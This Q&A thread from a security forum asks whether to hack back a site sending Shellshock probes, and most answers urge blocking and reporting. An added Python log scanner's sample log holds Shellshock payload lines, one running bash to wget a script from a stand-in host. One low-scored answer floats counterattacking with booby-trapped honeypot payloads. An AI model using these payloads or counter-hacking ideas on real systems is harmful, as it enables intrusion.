Score: 50

A website (www.blue*****art.com) is trying to attack my server using the Shellshock vulnerability. After doing an Nmap scan on the attacking IP address, I found many open ports. It looks like the website is running Exim, which is vulnerable to GHOST.

The website in question has not been maintained for the past three years (from copyright date, Twitter and Facebook status); possibly the owner passed away. A check with Sucuri shows that it is currently not blacklisted, because no malware has been found.

Should I retaliate by taking over the website from the hacker and shutting it down to stop it from scanning other people's computers?

asked by user67281; edited by Peter Mortensen

  • [+8] Related: [How can I punish a hacker?](http://security.stackexchange.com/questions/35738/how-can-i-punish-a-hacker/35747#35747) – S.L. Barth Jan 29 '15 at 15:06
  • [+21] Hackers usually use websites to keep on hacking. I strongly recommend that you do not break into another website. – mzz Jan 29 '15 at 15:04
  • [+27] Two wrongs don't make a right. You will end up being just as liable/prosecutable as the original hacker. Can you not just block this IP for now, while you report through proper channels? – geoffmcc Jan 29 '15 at 18:38
  • [+1] There might be two questions mixed here. Whether that could be argued in court to be a lawful attack (as in self-defense) in whatever territory that is could be an interesting question, but then there's the ethical question, which might also depend on the first. – Smig Jan 29 '15 at 19:45
  • @Smig I'm thinking that blocking the IP address, as geoffmcc suggests, would be the digital equivalent of self-defense. – S.L. Barth Jan 29 '15 at 21:12
  • [+10] @Smig it's not a particularly interesting question - AFAIK absolutely no jurisdiction anywhere has anything similar to a legal "virtual self-defense" doctrine that would allow one to retaliate for a cyberattack, and it would be a major news item in the field with interesting discussion if some law like that was passed anywhere. Some government agencies may be granted immunity/authorization for *attack* as such, but even then it legally doesn't matter if it's a "counterattack" or simply hacking the system for their goals. – Peteris Jan 29 '15 at 22:44
  • [+26] I think the better analogy here in any case would be discovering that a thief had stolen your property, and breaking into his house to steal it back. You might have the moral high ground, but you sure as hell don't have the legal one. – sapi Jan 30 '15 at 00:15
  • [+2] While I would love to grab an eyepatch and answer with a hearty "Arr!", I think that everyone here, including the OP, knows that vigilante e-justice is (almost) never a good plan. – Lilienthal Jan 30 '15 at 12:45
  • @Peteris I don't disagree. I'm just trying to clarify and narrow down the question. By asking if he "should" instead of if he "could", it wasn't clear if it was going beyond the letter of the law. The legal question might have an objective answer, but the ethical question doesn't. – Smig Jan 30 '15 at 18:10
  • @sapi definitely not "sure as hell". It's a thing that would make sense, and I accept that the law likely doesn't usually allow that, but since it's "reasonable", I would never consider it "sure". – o0'. Jan 30 '15 at 23:29
  • [+5] When it is still online for 3 years, someone is paying the hosting bills. – Philipp Jan 31 '15 at 17:08
  • You mean like [Code Green](http://w.spyware32.com/170/11525/IISWormCodeGreen.html)? And [nematodes](http://virus.wikidot.com/nematode) in general. – Ben Voigt Feb 01 '15 at 00:39
  • [+2] @sapi Your analogy doesn't work. Getting your stuff back from a thief isn't theft, because theft is, by definition, taking something that doesn't belong to you. In a jurisdiction where trespass is a civil matter, as long as you didn't damage anything or take anything other than your property, I don't think you'd be committing any kind of crime. – David Richerby Feb 01 '15 at 19:40
  • Legally you cannot hack the website. Morally, though, I would not feel guilty for hacking a server that is trying to hack mine. Here's how I view it: hacking a website that is actively hacking you is comparable to self-defense if somebody is attacking you. A judge may not agree with that, but is the hacker going to go to the police because he got hacked and kicked off of a machine? Not likely. It's a tough decision with many different viewing angles, but I suppose if you view the situation black-and-white, then it is illegal to do it. – Spencer D Feb 01 '15 at 20:03

5 Answers

Score: 87

Not if you want to stay out of trouble.

What you are suggesting is vigilante action, and most legal systems do not look kindly upon that. Even though you may feel you are protecting other, less tech-savvy people, it would probably still constitute a crime.

What you could do is try to find out if there are authorities to warn. This could be the hosting provider, the registrar, or the police of the country where the website is hosted. Or, if you believe the site has been hijacked, find either the owner or their remaining relatives.

– S.L. Barth

  • [+1] Is it vigilante action? Or self-defense? – corsiKa Jan 30 '15 at 14:55
  • [+30] @corsiKa It is vigilante action. For self-defense, it is sufficient to block the IP address until the situation is resolved. – S.L. Barth Jan 30 '15 at 14:58
  • [+3] @S.L.Barth Blocking an IP address will protect you from everything from that IP address except bandwidth consumption. It's possible that there are situations where that bandwidth consumption is a problem, and there might be something one could do to the sender which would cause the stream of packets to stop. But it is rarely a good idea to take such actions. – kasperd Jan 31 '15 at 18:18
  • [+2] @kasperd, yes, you could for example "tarpit" its connections. Depending on the scanning method and system, this could even bring down the attacker's machine due to resource exhaustion. – LSerni Jan 31 '15 at 23:01
Score: 66

You should contact the hosting provider; their contact information can be found with a whois lookup of the server's IP address. You should give the hosting provider logs with the evidence that the attacks originated from that IP.

The hosting provider can inspect network traffic to find out if any attack is still ongoing and take the host offline if necessary.

– kasperd

  • [+5] I'm sure someone who knows about Shellshock, Sucuri, GHOST and Exim also knows how "their contact information can be found" and that they "should give the hosting provider logs with the evidence that the attacks originated from that IP". – Dan Dascalescu Jan 31 '15 at 21:15
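As an added example, not code from the thread or from any of the answerers: the log evidence kasperd suggests sending to the provider can be pulled out of a combined-format web server access log mechanically rather than by eyeballing it. The Python below looks for the Shellshock signature (a value beginning with the bash function definition `() {`, which is what CVE-2014-6271 needs; attackers vary the whitespace and sometimes URL-encode it) in the request line, Referer and User-Agent of every parsed line, groups the hits per source IP, and renders a summary plus the untouched raw lines for an abuse report. The sample log lines and the addresses in them are constructed for the example (RFC 5737 documentation ranges), not taken from the asker's server.

```python
"""Pull Shellshock probe attempts out of a combined-format access log and
summarise them per source IP for an abuse report.

Added example, not code from the thread. The sample log below is constructed;
203.0.113.42 and 198.51.100.7 are documentation addresses (RFC 5737).
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache/Nginx "combined" format:
#   ip ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)

# CVE-2014-6271 needs an environment variable whose value starts with a bash
# function definition, "() {"; scanners vary the whitespace, so match loosely.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample: three probes from one host, one benign request from another.
SAMPLE_LOG = """\
203.0.113.42 - - [29/Jan/2015:14:55:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.42/x.sh -O /tmp/x'"
198.51.100.7 - - [29/Jan/2015:14:55:03 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/35.0"
203.0.113.42 - - [29/Jan/2015:14:55:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "() { :; }; echo vulnerable" "curl/7.38.0"
203.0.113.42 - - [29/Jan/2015:14:55:15 +0000] "GET /cgi-bin/php?%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 404 209 "-" "python-requests/2.5.1"
"""


def _decode(value, rounds=3):
    """Undo URL-encoding, repeated a few times because some scanners double-encode."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_shellshock_attempts(log_text):
    """Return {source_ip: [event, ...]} for every line carrying a Shellshock payload.

    Each event records the timestamp, which field carried the payload, the
    decoded payload, and the untouched log line (the evidence to forward).
    Lines that do not parse as combined format are skipped, not guessed at.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            decoded = _decode(m.group(field))
            if SHELLSHOCK_RE.search(decoded):
                hits[m.group("ip")].append({
                    "timestamp": m.group("ts"),
                    "field": field,
                    "payload": decoded,
                    "raw_line": line,
                })
    return dict(hits)


def format_abuse_report(hits):
    """Render the findings as the plain-text summary you would send to abuse@."""
    out = []
    for ip in sorted(hits):
        events = hits[ip]
        out.append(f"Source {ip}: {len(events)} Shellshock probe(s), "
                   f"first {events[0]['timestamp']}, last {events[-1]['timestamp']}")
        for ev in events:
            out.append(f"  [{ev['timestamp']}] in {ev['field']}: {ev['payload']}")
        out.append("  raw log lines:")
        out.extend("    " + ev["raw_line"] for ev in events)
    return "\n".join(out)


if __name__ == "__main__":
    print(format_abuse_report(find_shellshock_attempts(SAMPLE_LOG)))
```

Run it against a real log with `find_shellshock_attempts(open("access.log").read())`; the report keeps the raw lines because the provider's abuse desk will want the original evidence, not a paraphrase, and the per-IP grouping is what lets you also feed the same addresses into a firewall block while the report is being handled.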
Score: 38

Many times the attacking website has no clue their site is attacking. I own a hosting company, and we're typically notified through our abuse email address by the party being attacked.

Upon investigation, we find one of:

  1. a world-writable folder where rogue scanning scripts have been installed,
  2. poorly created websites that allow unrestricted uploading,
  3. compromised FTP accounts.

In most, if not all, cases our clients had no clue.

Other than that, it's illegal/unethical to retaliate.

– Alteci (edited by Malachi)
Score: 2

If someone were attacking you in real life you would have options:

  • Run
  • Defend yourself

I would say that this is a similar situation. If you put the right countermeasures in place and feel that the hacker is going to attempt at all costs to hack your server, I would say you are left with no other option but to defend at all costs, or lock up the castle and call for help.

Explore your options.

  • Law enforcement
  • Internet authorities
  • Shutting down the site
  • Taking over the site
  • etc.

I would say that if you take over or shut down the site, that this hacker may (probably will) retaliate against you.

You should

  • Collect logs
  • Get information on the hacker
      • IP address, etc. - stuff you can do passively
  • Contact authorities

Law enforcement and Internet authorities have resources that you may or may not have. They are prepared for these kinds of attacks and the retaliation that comes with tracking them down.

You don't know who is hacking you or how much resources they have at their disposal.

So, unless you are something like a Penelope Garcia, I wouldn't recommend going toe-to-toe with a hacker in his own neighborhood.

– Malachi (edited by Peter Mortensen)

  • [+2] What about simply blocking the IP on your firewall? – schroeder Jan 29 '15 at 23:43
  • @schroeder, I think that falls under `etc.`, doesn't it? I know that I didn't really hint in that direction. Blocking IPs is a never-ending battle if the hacker is insistent on attacking your system; they may have access to other IPs or can spoof their IP. – Malachi Jan 30 '15 at 14:15
Score: -3

Obviously the safest bet would be to do what most of the responders have already suggested, logging and notifying the appropriate resources to get it shut down...but that's no fun is it?

Should the ongoing attacks be of the active sort as opposed to automated botnet types of attacks (which sounds closer to what you are dealing with... and I have little familiarity with this particular vulnerability), where a live attacker's goal is to penetrate your system and perhaps take something valuable, then I've cough cough played with the idea of retaliating with a BearTrap (think honeypot leading to a disguised malicious payload). Legally, that's a little less straightforward now, isn't it, versus an active takeover action... although much more sophisticated.

If you break into my house, steal my safe and upon cracking it open it explodes in your face then, hey...

Of course this probably invites greater, more motivated retaliation in the end...but the moral and legal lines are much more blurred...

  • [+12] If you booby-trap a safe and it blows up in a would-be safecracker's face, you'll be charged with, and probably convicted of, attempted murder. Self-defense is restricted to what is known as "reasonable force", and only in the presence of an immediate threat. Blowing up a safecracker fails both tests, as does counter-hacking an attacker. – Mark Jan 31 '15 at 00:09
  • The legality issue related to the creation of a honeypot, not the safe ANALOGY... I thought that would be obvious, but apparently not to all. I don't think putting a bomb in a safe that explodes upon opening would solve anything. To be clear, I'm referring to the idea of someone stealing something that might not be as beneficial as they believe. You would need to hire the worst lawyer to – AgonyOfVictory Feb 02 '15 at 16:20
  • I see it as very difficult to prove any intent to do harm from stolen, "experimental" code... that's some Minority Report type shit... – AgonyOfVictory Feb 02 '15 at 16:39
  • No one cares about your code, and even if they do, it's the source code they want, not binaries. The chance of someone running your malicious code on their machine is slim at best. More likely, they'll be running it on *your* machine -- since what they're generally after is the ability to launch future attacks against third parties anonymously and without taking up their own bandwidth and CPU. – cHao Feb 03 '15 at 10:54
  • Probably true, but it's not unheard of and technically possible. All intrusions aren't the same; I wouldn't overestimate the avg. attacker's sophistication either... **Honeypot Stings Attackers With Counterattacks**: http://www.darkreading.com/vulnerabilities---threats/honeypot-stings-attackers-with-counterattacks/d/d-id/1139424? "aggressive and offensive honeypots are a controversial concept and the legal ramifications are tricky. Sintsov, who presented his honeypot experiment findings at Black Hat Europe this month in Amsterdam, says the legal issues are up for interpretation..." – AgonyOfVictory Feb 04 '15 at 17:08